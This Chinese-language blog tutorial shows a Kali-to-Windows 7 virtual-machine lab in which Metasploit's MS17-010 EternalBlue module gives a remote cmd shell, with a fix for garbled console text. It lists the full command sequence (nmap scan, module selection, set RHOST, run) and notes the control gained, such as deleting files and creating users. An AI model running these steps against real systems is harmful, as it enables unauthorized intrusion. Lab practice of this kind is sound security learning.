kali使用msf 通過ms17_010_eternalblue(永恆之藍)漏洞攻擊win7測試 及亂碼問題解決

兩臺Vmware虛擬機:

Kali

Win7 64位:

(主機)kali的ip是 192.168.0.119

(靶機)win7的ip是192.168.0.109

使用nmap端口掃描工具,掃描一下目標靶機;如下圖,可以發現:目標win7系統的445端口開啓,可以使用永恆之藍漏洞攻擊

Kali終端輸入msfconsole,啓動msfconsole;如下圖,啓動畫面每次都不一樣 圖像不一樣不用擔心

   

先查找一下永恆之藍的攻擊模塊: 使用命令 search eternalblue

使用該攻擊模塊:

命令:use exploit/windows/smb/ms17_010_eternalblue ,

使用這個模塊,我們show targets看一下這個模塊適用於哪些系統的主機

查看一下攻擊配置show options

 

可以看到,win7和server 2008 r2都適用

設置要攻擊的靶機IP地址:set RHOST 192.168.0.109

接着run執行攻擊

程序就會運行,當看到WIN的時候,說明我們已經滲透進win7裏面去了,按下回車出現了win7的cmd,這是已經是滲透成功了。但有時候不一定會成功,會返回FAIL,說明這個系統打了補丁,這個漏洞已經沒有威力了。


攻擊成功!!! 成功進入到靶機的cmd管理界面

但是,此時界面爲亂碼,我們解決一下編碼的問題:在靶機的命令行界面:執行命令 chcp 65001 切換編碼字符,然後執行命令 顯示正常。

此時,我們已經滲透進靶機的cmd操作界面,可以對靶機爲所欲爲(重啓 刪文件 創建文件 執行exe 創建用戶等等)了。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章